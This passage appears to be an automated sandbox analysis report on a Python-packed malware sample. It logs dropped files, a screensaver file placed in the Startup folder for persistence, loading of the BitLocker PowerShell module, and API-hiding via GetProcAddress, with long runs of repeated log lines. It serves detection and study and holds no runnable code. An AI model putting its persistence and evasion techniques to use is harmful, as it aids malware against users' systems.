Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76002\VCRUNTIME140.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76002\_sqlite3.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76002\_ctypes.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76002\unicodedata.pyd Jump to dropped file
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr Jump to behavior
Stores files to the Windows start menu directory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Code function: 0_2_00007FF7B10F51E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00007FF7B10F51E0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
